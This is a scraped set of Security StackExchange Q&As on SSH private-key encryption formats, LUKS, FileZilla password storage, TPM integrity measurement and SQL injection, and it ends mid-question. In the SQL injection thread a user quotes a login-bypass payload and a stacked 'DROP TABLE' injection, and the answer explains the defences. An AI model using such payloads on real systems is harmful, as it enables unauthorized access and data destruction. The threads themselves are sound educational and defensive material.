39,279 | I configured my server to encrypt user passwords using 500,000 rounds of SHA-512. The question is, how does the standard AES-128-CBC encrypted SSH private key stack up to that, provided the same (or similar length) password/passphrase is used? This must be a human-typeable passphrase, of course, and the lack of entropy in this is (hopefully) the weakest link here. My understanding is that key-strengthening will extend the effort required to brute-force the passphrase, no matter how weak the passphrase is. It's clear to me that since the public key is public, and can be used to verify the private key, the security of that private key will depend on the passphrase (the length of the RSA key will not factor in to how easy it is to reveal it). I imagine that check would be quite fast, so I would ideally want to increase the number of rounds and use stronger cipher suites so that the process of bruteforcing the passphrase is slowed down. How much extra security on the passphrase can be gained by using PKCS#8 for a SSH private key? I'm also wondering about ways to potentially improve upon this. Is there a way to make this encryption openssl pkcs8 -topk8 -v2 des3 use even more rounds than the default (and still be accepted by ssh )? Also, are there even stronger suites that can be used? I'm dealing with Centos 6.4 here for now (since I like kickstart scripts), so it's probably a good idea not to be messing with the secure program suite if I can help it, but maybe there exists an even stronger symmetric cipher suite than PKCS#8 that can be used? One thing I noticed is that the PBKDF2 here doesn't seem to specify the underlying hash used. Looking at the list it doesn't get any better than SHA1 it seems. I want to find a way to make the best use of the ~0.5 second tolerable for successful authentication to help maximize the amount of computation required for brute-forcing. I guess if I really cared about strengthening I should be looking at scrypt , but there is no native support in the tools for it, so this can't be used for day-to-day SSH private key management (but it could be suitable for use in special applications). Edit: Interesting. My encrypted private-key on CentOS looks like this: -----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,D3A046CD... I suppose this isn't necessarily any worse than AES-128-CBC (which is what my Mac produced). | What happens for private key storage is a bit intricate because it involves several layers of underspecified crud accumulated over years and kept for backward compatibility. Let's unravel the mystery. For its cryptographic operations, including private key storage (that which we are presently interested in), OpenSSH relies on the OpenSSL library . So OpenSSH will support what OpenSSL supports. A private key is a bunch of mathematical objects which can be encoded in a structure which is, normally, binary (i.e. a bunch of bytes , not printable characters ). Let's assume a RSA key. The format for a RSA private key is defined in PKCS#1 as an ASN.1 structure which will be encoded using the DER encoding rules. Since a lot of crypto-related tools began their life in the early and mid-1990s and, at that time, email was most fashionable (the Web was still young), tools strived at using characters which could be pasted into an email (attached files were not yet common in these days). Notably, there was an early standard called Privacy-enhanced Electronic Mail , or "PEM". That standard was never really deployed or used, and other systems trumped it (namely PGP and S/MIME ), but one feature of PEM stuck: a way to encode binary object into printable text. This is the PEM format . It looks like this: -----BEGIN SOMETHING-----
Some-optional: headers
Base64+Encoded+Data==
-----END SOMETHING----- So PEM is a kind of wrapper with the binary data being encoded in Base64 , and header and footer lines added, which include a type (the "SOMETHING"). The "optional headers" is a later addition of OpenSSL, and it has never been standardized, so PEM-with-headers is documented only as "what OpenSSL does". OpenSSL documentation being what it is, this means that, in order to know what this process exactly entails, you have to dive in the dreaded OpenSSL source code. Here is an unencrypted RSA private key, in PEM format: -----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDQ33ndDr5N/AI8y2PzrqGbadLeS5fSf2GsVJx2B2KxhazL2z5O
ufin+wjJ1hW12/zWyQs/9CFYQFrife+PrMUOdLitsmlD3l4lBQ29+XKsmPabtINP
JQ0n4dxgBGeFxTCd4lJwiysmVsXPnNrgQTcx2nirrIk1C7wSW9Ai9W3fZQIDAQAB
AoGBAKiKSvkW9nRSzzNjIwn0da7EG0UIVj+iTZwSwhVzLC32oVH1XTeFVKGnLJZA
y0/tbP2bSBqY0Xc2pp9v4yhZzr6/BUPX+N1FOW8Q5OXHMD4fXSixrX0vYOT8hQuC
ehTAXsStjkZqzCdCsKV9YIduTHoyjL2jG6QBvFQK7kHaYUwZAkEA+rp2b+eBDJrg
lqcPOE2HkCkQcReSW0OIoUgd2tIiPFL8HSNwKvvAAH+QBKL6jvecLswJneecon8Z
jsgn4K/EpwJBANVDultbYq/h3F5FbAQ4r6cMQ2ZmmhMFdt8rRvAdEz18CuobGvAQ
y31hU/InW0n+Z0oHCsIgyowSeCGwRLMJYRMCQGKDXQG+/k+Lku7emPZQUBFucQ1e
a5z8PfTQtxpBMj5thK2WPP5GiDwp4tZPiw8dbvpcJPMsC7k1Iz+cmT6JEUUCQBxz
X54mb+D06bgt3L4nbc+ERE2Z7H4TIYueM2V/C30NWktm+E4Ef5EnddJ9S6Fwbgkj
LV0+kKblI9+iq1eTLb8CQQC+QDF7Y1o4IpDGcu+3WhS/pI/CkXD2pDMJM6rGBgG6
g9D1VTPCx0LZAWK4GdmELhPM+0ePH4P24/VsJY4mvutQ
-----END RSA PRIVATE KEY----- As you can see, the type is "RSA PRIVATE KEY". The ASN.1 structure can be explored with openssl asn1parse : $ openssl asn1parse -i -in keyraw.pem
0:d=0 hl=4 l= 605 cons: SEQUENCE
4:d=1 hl=2 l= 1 prim: INTEGER :00
7:d=1 hl=3 l= 129 prim: INTEGER :D0DF79DD0EBE4DFC023CCB63F3AEA19B69D2DE4B97D27F61AC549C760762B185ACCBDB3E4EB9F8A7FB08C9D615B5DBFCD6C90B3FF42158405AE27DEF8FACC50E74B8ADB26943DE5E25050DBDF972AC98F69BB4834F250D27E1DC60046785C5309DE252708B2B2656C5CF9CDAE0413731DA78ABAC89350BBC125BD022F56DDF65
139:d=1 hl=2 l= 3 prim: INTEGER :010001
144:d=1 hl=3 l= 129 prim: INTEGER :A88A4AF916F67452CF33632309F475AEC41B4508563FA24D9C12C215732C2DF6A151F55D378554A1A72C9640CB4FED6CFD9B481A98D17736A69F6FE32859CEBEBF0543D7F8DD45396F10E4E5C7303E1F5D28B1AD7D2F60E4FC850B827A14C05EC4AD8E466ACC2742B0A57D60876E4C7A328CBDA31BA401BC540AEE41DA614C19
276:d=1 hl=2 l= 65 prim: INTEGER :FABA766FE7810C9AE096A70F384D879029107117925B4388A1481DDAD2223C52FC1D23702AFBC0007F9004A2FA8EF79C2ECC099DE79CA27F198EC827E0AFC4A7
343:d=1 hl=2 l= 65 prim: INTEGER :D543BA5B5B62AFE1DC5E456C0438AFA70C4366669A130576DF2B46F01D133D7C0AEA1B1AF010CB7D6153F2275B49FE674A070AC220CA8C127821B044B3096113
410:d=1 hl=2 l= 64 prim: INTEGER :62835D01BEFE4F8B92EEDE98F65050116E710D5E6B9CFC3DF4D0B71A41323E6D84AD963CFE46883C29E2D64F8B0F1D6EFA5C24F32C0BB935233F9C993E891145
476:d=1 hl=2 l= 64 prim: INTEGER :1C735F9E266FE0F4E9B82DDCBE276DCF84444D99EC7E13218B9E33657F0B7D0D5A4B66F84E047F912775D27D4BA1706E09232D5D3E90A6E523DFA2AB57932DBF
542:d=1 hl=2 l= 65 prim: INTEGER :BE40317B635A382290C672EFB75A14BFA48FC29170F6A4330933AAC60601BA83D0F55533C2C742D90162B819D9842E13CCFB478F1F83F6E3F56C258E26BEEB50 We recognize here the components of a RSA private key: some big integers. See PKCS#1 for mathematical details. It so happens that the PEM-extended format that OpenSSL uses supports password-based encryption . After some code reading, it turns out that encryption uses CBC mode, with an IV and algorithm specified in the headers; and the password-to-key transform relies on EVP_BytesToKey() (defined in crypto\evp\evp_key.c ) with the following features: This is a non-standard hash-based key derivation function . The IV for encryption is also used as salt. The hash function is MD5. The hash is used repeatedly, for n iterations, but in the case of PEM encryption, the iteration count n is set to 1. That the KDF is non-standard is a source of worry. Reusing the encryption IV for a salt is a minor worry (that's mathematically unclean, but probably not a real problem -- and, at least, there is a salt). Use of MD5 is also a minor worry (though MD5 is thoroughly broken with regards to collisions, key derivation usually relies on preimage resistance , for which MD5 is still quite strong, almost as good as new). The iteration count set to 1 (which means, no loop at all) is a serious issue. This means that if an attacker tries to guess the password for a PEM-encrypted key, the computational cost for each try will be minimal. With a good GPU, that attacker could try several billions of passwords per second . That's way too fast for comfort. Password-based key derivation should be both salted and slow , and the OpenSSL PEM-encryption format fails on the second point. See this answer for a detailed discussion. Here is a PEM-encrypted private key; encryption algorithm was set to AES-128. The password is "1234": -----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,8680A1BEAE5661AAD8DA344B7495BCD4
4cvmuk8onrB5IQVRr6xRUBt6yRcjNUGcUWq0CcyX4p4iijANv/S7H5Ga8e5e+12m
k6UUt65mF54Ddh+WE4lHHy5yYEPa25tr/KBMErEhHJxYFiwRwgw/KoF2V8Cpgidd
BA5aeO+5/FmCiTkx/tGYbpE2emfcQ+oNdAKRhIEjIAfItrU4Bj2nQZdiiY0tFEfT
hn5HZ0X1i1yi63nxVGQH+oQQH9+ccPk87cIRLf3IK1B3M0J0j11XDhQdIXwAx9hV
52GXgkk0NX7EtT5Cq3x0Q513e70QA9ua1lt8yaCynkLrYKmMQQCKsLlJDSh+sUyu
ndiVl0g73cUPd962Tp/WCLOV4/DWShfZexfjoibjCkR81OVa9cguYITCXV3QGRCM
wo09DI/INOs1s6FS4ZKugpwgKEX6knh0Fo1i6DdVJQfeQvUo+MhbFjjK0SXT4QWc
4rlQv0Q1YoNn1EzFzsVwx7PhtU9wo4PU1978+582mrJBjteIN9a8z+7lZT1qKynD
BG3XUjnWAq4k5KUj5mEJkSSs2R2AIhHNiSmwmcuzHf67er1KrWvL+g8AXXJ8xLjh
P6ImJeMoEI7P2zb4FvSkQFF5SDjmaPNPpo6xe330EdSSWZTZtcgc9yH++I8ZX9Kb
0UnWic5HTZOx0VLqEqDw+iWufnUDMvq98tGD5c+BQqqofBZae5YNYfko1tCGoz/3
ZygMcOdRqRugur5SiCZnYCnIeQvVNi7nwfp2Bb3K0XMCr12IdeRDuoe45MzoG9zD
hLk0Y3VHS3eANvEsBMAwcyTBjgs8Q3bHdHwnPjVcAo3auOkyXUHZ7DEIxnmvVfaS
-----END RSA PRIVATE KEY----- Because of the encryption, the bytes can no longer be analysed with asn1parse . PKCS#8 is an unrelated standard for encoding private keys. It is actually a wrapper. A PKCS#8 object is an ASN.1 structure which includes some type information and, as a sub-object, a private key. The type information will state "this is a RSA private key". Since PKCS#8 is ASN.1-based, it results in non-printable binary, so OpenSSL will happily wrap it again in a PEM object. Thus, here is the same RSA private key as above, as a PKCS#8 object, itself PEM-encoded: -----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBANDfed0Ovk38AjzL
Y/OuoZtp0t5Ll9J/YaxUnHYHYrGFrMvbPk65+Kf7CMnWFbXb/NbJCz/0IVhAWuJ9
74+sxQ50uK2yaUPeXiUFDb35cqyY9pu0g08lDSfh3GAEZ4XFMJ3iUnCLKyZWxc+c
2uBBNzHaeKusiTULvBJb0CL1bd9lAgMBAAECgYEAqIpK+Rb2dFLPM2MjCfR1rsQb
RQhWP6JNnBLCFXMsLfahUfVdN4VUoacslkDLT+1s/ZtIGpjRdzamn2/jKFnOvr8F
Q9f43UU5bxDk5ccwPh9dKLGtfS9g5PyFC4J6FMBexK2ORmrMJ0KwpX1gh25MejKM
vaMbpAG8VAruQdphTBkCQQD6unZv54EMmuCWpw84TYeQKRBxF5JbQ4ihSB3a0iI8
UvwdI3Aq+8AAf5AEovqO95wuzAmd55yifxmOyCfgr8SnAkEA1UO6W1tir+HcXkVs
BDivpwxDZmaaEwV23ytG8B0TPXwK6hsa8BDLfWFT8idbSf5nSgcKwiDKjBJ4IbBE
swlhEwJAYoNdAb7+T4uS7t6Y9lBQEW5xDV5rnPw99NC3GkEyPm2ErZY8/kaIPCni
1k+LDx1u+lwk8ywLuTUjP5yZPokRRQJAHHNfniZv4PTpuC3cvidtz4RETZnsfhMh
i54zZX8LfQ1aS2b4TgR/kSd10n1LoXBuCSMtXT6QpuUj36KrV5MtvwJBAL5AMXtj
WjgikMZy77daFL+kj8KRcPakMwkzqsYGAbqD0PVVM8LHQtkBYrgZ2YQuE8z7R48f
g/bj9Wwljia+61A=
-----END PRIVATE KEY----- As you see, the type indicated in the PEM header is no longer "RSA PRIVATE KEY" but just "PRIVATE KEY". If we apply asn1parse on it, we get this: 0:d=0 hl=4 l= 631 cons: SEQUENCE
4:d=1 hl=2 l= 1 prim: INTEGER :00
7:d=1 hl=2 l= 13 cons: SEQUENCE
9:d=2 hl=2 l= 9 prim: OBJECT :rsaEncryption
20:d=2 hl=2 l= 0 prim: NULL
22:d=1 hl=4 l= 609 prim: OCTET STRING [HEX DUMP]:30820<skip...> (I have cut a lot of bytes in the last line). We see that the structure begins by an identifier which says "this is a RSA private key", and the private key itself is included as an OCTET STRING (and the contents of that string are exactly the ASN.1-based structure described above). PKCS#8 optionally supports password-based encryption . This is a very open format so it is potentially compatible with every password-based encryption system in the world, but software has to support it. OpenSSL supports old DES+MD5 encryption, or the newer PBKDF2 and a configurable algorithm. DES (not 3DES) is a minor issue: DES is relatively weak because of its small key size (56 bits) making a break through exhaustive search technologically feasible (it has been done); however, this would be quite expensive for an amateur. Still, it is better to use PBKDF2 and a better encryption algorithm. Given a raw private key as shown above, here is an OpenSSL command-line which turns it into a PKCS#8 object, with 3DES encryption and PBKDF2 for the password-based key derivation: openssl pkcs8 -topk8 -in keyraw.pem -out keypk8.pem -v2 des3 which yields: -----BEGIN ENCRYPTED PRIVATE KEY-----
MIICxjBABgkqhkiG9w0BBQ0wMzAbBgkqhkiG9w0BBQwwDgQIZT3rvVU85p0CAggA
MBQGCCqGSIb3DQMHBAgtYXWrNG+OYgSCAoCewt8WkgCDaBCSOoe88WTpV2haxUFW
iWkdJQtEkzkpYnwA0E0Bj5CBnSd3EdSRmup0rP9WxzdMe+qx2N+GGLTcmA7pMyBV
XK9OTdiixMWvlG64lrLFtQxoKaxo48zUVobLuRrtaVLvwZ7OpO4hA2zsl6qaWaV7
8GEiAWz28K3DIBDVr1CKpEdFf7epkC7e1/ojJDNAwPiE9rxkaqGHpogqJQKb5s8X
ZyGhVG3rPuwgOxhU5d1G7K6+N9wKYkZXiCmsoqZxD94M3QH8sM8YF41rxBsbPSJ/
7JgGQMOJQxxrdeHSAt5P1iasI7lNXa7HacTZl1nPDXpnpjKA5E/jNMf1EgV+sN3f
pL4GoFvw8zImOF4OHdo9KBz61oKFylQrGQM6WhCsTqsSVZxR0tH8ERSOhhWn2wmy
NgiagfVT4nED9XFInEwTKoXKUjTSOHUmbTl/HF637NrYjSBLgT/e+XBQBmFMSaNc
+KLlJRHpjB8QZ8cIdDFwVIYkmm4Po7h1uYob1d2/4saxjHrtZ8f7GqmT/SGXMpj5
eL0bXDXdjcapDkLx5X0/BYI3AYTlFXEZU0UJT8aad0Fiygw1bLVDR8yDl63Bthlb
gS15LhjqGYGhgX3tARS94HtBvlSAtgV6AB5QjEJfU7jgyu0lFn1hTULmwFJVkjj6
Oy2WeuHseOZ1X45V7DvNcS1iT7fttwQZoSvdks8WulsodpOr7sbtaJbsUUToTxIN
GtNQo9Ce/QAeONmSf8G9jbBURBmLH+kzzzptYcCsVaaUnWPpgebH/WJRa83quPw6
fwy3xZgg9pPHFBiFAG2c3Uuelat/eXhXdW74XlDgOIpmbMfsDxaVOiuM
-----END ENCRYPTED PRIVATE KEY----- So now that's an "ENCRYPTED PRIVATE KEY". Let's see what asn1parse can say about it: 0:d=0 hl=4 l= 710 cons: SEQUENCE
4:d=1 hl=2 l= 64 cons: SEQUENCE
6:d=2 hl=2 l= 9 prim: OBJECT :PBES2
17:d=2 hl=2 l= 51 cons: SEQUENCE
19:d=3 hl=2 l= 27 cons: SEQUENCE
21:d=4 hl=2 l= 9 prim: OBJECT :PBKDF2
32:d=4 hl=2 l= 14 cons: SEQUENCE
34:d=5 hl=2 l= 8 prim: OCTET STRING [HEX DUMP]:653DEBBD553CE69D
44:d=5 hl=2 l= 2 prim: INTEGER :0800
48:d=3 hl=2 l= 20 cons: SEQUENCE
50:d=4 hl=2 l= 8 prim: OBJECT :des-ede3-cbc
60:d=4 hl=2 l= 8 prim: OCTET STRING [HEX DUMP]:2D6175AB346F8E62
70:d=1 hl=4 l= 640 prim: OCTET STRING [HEX DUMP]:9EC2DF16920<skip...> We see there that PBKDF2 is used. The OCTET STRING with contents 653DEBBD553CE69D is the salt for PBKDF2. The INTEGER of value 0800 (that's hexadecimal for 2048) is the iteration count. Encryption itself uses 3DES in CBC mode, with its own randomly generated IV ( 2D6175AB346F8E62 ). That's fine. PBKDF2 uses SHA-1 by default, which is not an issue. It so happens that while OpenSSL supports somewhat arbitrary iteration counts (well, keep it under 2 billions to avoid issues with 32-bit signed integers), the openssl pkcs8 command-line tool does not allow you to change the iteration count from the default 2048, except to set it to 1 (with the -noiter option). So that's 2048 or 1, nothing else. 2048 is much better than 1 (say, it is 2048 times better), but it still is quite low by today's standard. Summary: OpenSSH can accept private keys in raw RSA/PEM format, RSA/PEM with encryption, PKCS#8 with no encryption, or PKCS#8 with encryption (which can be "old-style" or PBKDF2). For password protection of the private key, against attackers who could steal a copy of your private key file, you really want to use the last option: PKCS#8 with encryption with PBKDF2. Unfortunately, with the openssl command-line tool, you cannot configure PBKDF2 much; you cannot choose the hash function (that's SHA-1, and that's it -- and that's not a real problem), and, more importantly, you cannot choose the iteration count, with a default of 2048 which is a bit low for comfort. You could encrypt your key with some other tool, with a higher PBKDF2 iteration count, but I don't know of any readily available tool for that. This would be a matter of some programming with a crypto library. In any case, you'd better have a strong password. 15 random lowercase letters (easy to type, not that hard to remember) will offer 70 bits of entropy, which is quite enough to thwart attackers, even when bad password derivation is used (iteration count of 1). | {
"source": [
"https://security.stackexchange.com/questions/39279",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9786/"
]
} |
39,306 | How secure is the encryption offered by ubuntu (using the disk utility)? What algorithm is used underneath it? If someone could at least provide a link to some documentation or article regarding that I would be very grateful. Reference: | In a word: sufficient . This is block-level encryption, so it is filesystem-independent. Ubuntu's transparent encryption is done through dm-crypt using LUKS as the key setup. The built-in default for cryptsetup versions before 1.6.0 is aes-cbc-essiv:sha256 with 256-bit keys. The default for 1.6.0 and after ( released 14-Jan-2013 ) is aes-xts-plain64:sha256 with 512-bit keys. For older versions of cryptsetup : AES you certainly know; it's about as good a cipher as you could want. CBC is the chaining mode; not horrible but certainly not what I would pick for new projects: it has several issues but it can be used securely. ESSIV ("Encrypted salt-sector initialization vector") allows the system to create IVs based on a hash including the sector number and encryption key. This allows you to jump straight to to the sector you want without resorting to predictable IVs, and therefore protects you from watermarking attacks. SHA-256 is the hashing algorithm used for key derivation. LUKS uses PBKDF2 to strengthen the key for (by default) a minimum of 1000 iterations or 1/8 second, whichever is more. On a fast computer, expect around 200,000 iterations. With respect to security, you couldn't ask for a better arrangement. And with newer versions of cryptsetup : XTS is counter-oriented chaining mode. It's an evolution of XEX (actually: "XEX-based tweaked-codebook mode with ciphertext stealing"), while XEX ("xor-encrypt-xor") is a non-trivial counter-based chaining mode; neither of which I can claim to completely understand. XTS is already very widely supported and looks promising, but may have issues . The primary important details are these: No fancy IVs are necessary ( plain or plain64 is fine), and half of your key is used by XTS, meaning your original key must be twice as long (hence 512-bit instead of 256-bit). PLAIN64 is an IV generation mechanism that simply passes the 64-bit sector index directly to the chaining algorithm as the IV. plain truncates that to 32-bit. Certain chaining modes such as XTS don't need the IV to be unpredictable, while modes like CBC would be vulnerable to fingerprinting/watermarking attacks if used with plain IVs. Other options not used by default LRW has been largely replaced by XTS because of some security concerns , and is not even an option for most disk encryption products. benbi calculates a narrow-width block count using a shift register. It was built with LRW mode in mind. Altogether, this makes for a pretty tight system. It isn't the absolute best system theoretically possible, but it's pretty close. You should be able to trust it in any reasonable circumstances as long as your password is sufficient. Your attacker will almost certainly choose brute-forcing the password as his preferred attack method. | {
"source": [
"https://security.stackexchange.com/questions/39306",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28551/"
]
} |
39,310 | I've setup a test environment for running some SQL Injection against my code and learning how to defend against it. I can bypass the login form using the following in the password field: ' OR username = 'admin Which gives me the query: SELECT * FROM customer_data WHERE username = '' AND password = '' OR username = 'admin' This works fine but I'm having trouble with dropping a table. I've tried various attempts along the lines of inserting something like this in the password field: OR '1' = '1'; DROP TABLE temp; -- I created a table called temp just to try it against but nothing I can think of has worked. If I login to the PHP MyAdmin (same credentials as the page is using) I can manually insert the query that would be constructed above and it works just fine. | Answering your question mysql_query() doesn't support multiple queries as documented: mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier. Which means that DROP TABLE temp; -- is never executed. It is although possible if you use mysqli::multi_query or using PDO . Best practice Warning ? You see that big red warning box ? The mysql extension is in process of deprecation and will throw warnings as of PHP 5.5.0. There are even plans to drop it completely in PHP 5.6 or PHP 6.0 source . Note that mysql_ isn't broken as Ángel González stated: The extension is not broken. The problem is the bad usage. It can be used safely, and good developers have been doing so for ages, by creating php wrappers. In magic quotes, the work has been the opposite. The developers had been detecting the feature in php and disabling it. The new standard The new standard is MySQLi or PDO . I won't compare the two extensions here but there are really a bunch of good features especially from PHP 5.3+ which will save you time and efforts. Note that by using MySQLi/PDO won't protect you per se from SQL injections. The best option would be to use prepared statements . The data is sent separately from the query thus making it impossible to inject values. This is well explained by Anthony Ferrara in this video . Be careful But wait "impossible" ? That sounds just too great :) Say for example we have two groups: group1 & group2. There is a certain php file deleteUser.php getting an id from $_GET . The prepared statement looks like this: DELETE FROM users WHERE id = ? . When the query is made with $_GET['id'] the user with ID = $_GET['id'] will get deleted. Hey, but that means that users from group1 could delete users from group2 by using that ID which isn't intended. So we may edit the query in something like DELETE FROM users WHERE id = ? AND group = ? and sending the user's group name he's in along with the query. Short: prepared statements won't protect you from logic flaws. Multi query ? You don't need mutli queries. If you want to do two things then do it separately, it will give you more control over your queries and make your code more readable. On another note: If you're dynamically making and droping tables you're most likely doing it wrong. You should design your database in such a way that this isn't needed. Of course there may be exceptions but they are mostly busted since you may then look for a NoSQL solution (other db engine). TL;DR Stop using mysql_ functions and step over to MySQLi or PDO Use prepared statements, note that it will not protect you from attacks if you don't secure the logic behind it Don't use multi queries Make a good DB design If you want to train your hacking skills, you may check Vulnerable OS's? | {
"source": [
"https://security.stackexchange.com/questions/39310",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28535/"
]
} |
39,321 | Recently, an increasing number of people have started advising moving away from FileZilla. However, the only reason I can see for this is that FileZilla stores the connection information in a completely unencrypted form, but as Mozilla says - surely it is the job of the operating system to protect the configuration files? So, is there any other reason why I should no longer use FileZilla, as I've never had any problems with it? Somebody mentioned to me that the way it works isn't secure either, but I think they were just getting confused over the fact FTP transmits passwords in plain text anyway. | FileZilla per se isn't inherently insecure. Yes, it's storing passwords in plaintext, but the alternatives are only slightly more secure. You see, encrypting the credentials requires an encryption key which needs to be stored somewhere. If a malware is running on your user account, they have as much access to what you (or any other application running at the same level) have. Meaning they will also have access to the encryption keys or the keys encrypting the encryption keys and so on. Your best option here is to disable password storage in FileZilla Then start using KeePass to store your account credentials. There are also many guides on the Internet about how to integrate KeePass with FileZilla . Doing this, you're storing the encryption key somewhere where malware don't have access; you're storing the encryption key (or rather, the password from which the encryption key is derived) in your brain. Finally (and perhaps this is a bit outside the scope of your question), please make sure you move away from FTP in favor of SFTP . | {
"source": [
"https://security.stackexchange.com/questions/39321",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20099/"
]
} |
39,329 | I am trying to find out how the TPM performs an integrity measurement on a system. It is well-documented in the TPM specification how it seals the data it has measured in the PCRs and how it is updated. But that which I can't find explained is how the TPM actually performs the integrity measurements that it is sealing in the first place. To know if the system is in a given state or not it has to measure it, but how does it do that? And what is it that it actually measures? Most papers seem to gloss over this, and I get the feeling that ready-for-storage-in-PCR-data just appears out of the blue. | There's basically two way of doing this; SRTM (Static Root of Trust for Measurements) and DRTM (Dynamic Root of Trust for Measurements). SRTM takes place at system boot. The first thing getting executed at boot is called the Core Root of Trust for Measurements (CRTM) aka the BIOS boot block will measure the BIOS and send the value ( hash ) to the TPM in a location called Platform Configurations Register (PCR) 0 before executing it. Then the BIOS measure the next thing in the boot chain and again, will store the value in a PCR of the TPM. This process is executed for each components in the boot sequence (PCI option ROM, boot loader, etc). TrustedGrub is a TPM aware boot loader that will send the proper measurements to the TPM. It is use to continue the chain of measurements (SRTM) from the BIOS up to the Kernel. DRTM is very different as it's something happening while the system is running. Intel’s implementation is called Trusted Execution Technology ( TXT ) while AMD use the name Secure Virtual Machine (SVM). The goal of DRTM is to create a trusted environment from an untrusted state. Technically, it creates a secure/clean state and will report (provide measurement – hashes in PCRs) on a piece of code someone wants to execute (aka Measured Launched Environment - MLE). Typically, the MLE is an Operating System (kernel, userspace, etc). Without going into details, Intel's DRTM works by calling a set of new CPU instructions (SMX) which tells the CPU and the chipset to perform a very specific set of tasks (GETSEC) which ensure nothing else than a special code can run, i.e. SINIT Authenticated Code Module ( ACM ). This part includes disabling all but one CPU and blocking/stopping everything currently running: all other processes, interrupts and I/O (via IOMMU , e.g. to avoid DMA attacks). Then, all CPU rejoin in a clean state - anything executed before is discarded. At this point the signature of this special code (SINIT ACM) gets validated and its identity (hash measurement) is sent to the TPM in the PCR 17. Afterwards, execution is passed to the ACM which then measure the MLE and sends the measurement to the TPM in the PCR 18. Finally, execution is passed to the MLE. Tboot is a tool created by Intel to do just that (DRTM) and an alternative to TrustedGrub (SRTM). Here's an example of what PCRs values looks like with SRTM (TPM aware BIOS) but without a TPM aware boot loader (e.g. TrustedGrub) and without DRTM (e.g. Tboot): # cat /sys/devices/pnp0/00:09/pcrs
PCR-00: A8 5A 84 B7 38 FC C0 CF 3A 44 7A 5A A7 03 83 0B BE E7 BD D9
PCR-01: 11 40 C1 7D 0D 25 51 9E 28 53 A5 22 B7 1F 12 24 47 91 15 CB
PCR-02: A3 82 9A 64 61 85 2C C1 43 ED 75 83 48 35 90 4F 07 A9 D5 2C
PCR-03: B2 A8 3B 0E BF 2F 83 78 29 9A 5B 2B DF C3 1E A9 55 AD 72 36
PCR-04: 78 93 CF 58 0E E1 A3 8F DA 6F E0 3B C9 53 76 28 12 93 EF 82
PCR-05: 72 A7 A9 6C 96 39 38 52 D5 9B D9 12 39 75 86 44 3E 20 10 2F
PCR-06: 92 20 EB AC 21 CE BA 8A C0 AB 92 0E D0 27 E4 F8 91 C9 03 EE
PCR-07: B2 A8 3B 04 BF 2F 83 74 29 9A 5B 4B DF C3 1E A9 55 AD 72 36
PCR-08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-17: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-18: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-19: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-21: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-22: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 As you can see, PCR 0-7 are filled but from PCR 8 to 15 it's empty - they are still reset to 0. Since DRTM hasn't been used, PCRs 17-22 are filled with 1s (f). The security of those mechanisms relies on the fact that PCRs values cannot be set (or forged) but only extended ( TPM_Extend() ). This means whenever a measurement is sent to a TPM, the hash of the concatenation of the current value of a PCR and the new measurement is stored (i.e. new_value = Hash(old_value || new_measurement) ). Obviously, there's a beginning to all of this: With SRTM, only the CRTM can reset PCRs 0 to 15 at boot With DRTM, only the TXT instructions can reset PCRs 17 to 20 (when in locality 4 (SMX operations)). See this answer , this presentation or the specs for the details. It's important to understand that while the TPM collects those measurements, it does not take action on them -actually, it can't . The value of those measurements can only be seen with the seal() / unseal() / quote() operations: Now that we have measurements in the TPM's PCRs, we can use the unseal() operation to reveal a secret which is only accessible if the correct PCRs values are in the TPM-they are used as encryption keys. This basically means that a secret can only be accessed if the proper environment was loaded via SRTM (BIOS, bootloader, kernel, etc) or DRTM (SINIT and MLE (kernel, etc)). See this answer for more info. For more info, I suggest you read this 101 and then this document. | {
"source": [
"https://security.stackexchange.com/questions/39329",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12675/"
]
} |
39,676 | If I have a passphrase-protected SSH private key, AND if this passphrase is sufficiently random and long (say, 20-, 30-, 40-characters long, or even more!), AND if I make this private key of mine publicly available on the Net THEN, will it be practically possible for someone to be able to decrypt my private key from its corresponding public key (the latter being publicly available anyway). My guess the answer is most likely going to be: "The decryption effort and time taken will be totally dependent on the
length and randomness of the passphrase chosen, and there is nothing
inherent in SSH authentication algorithms/protocols that would speed
up or slow down the decryption effort. Thus, in the current
state-of-decryption-art, a 20+ characters long passphrase should be
sufficient enough. Even Gmail et al are recommending passphrases much
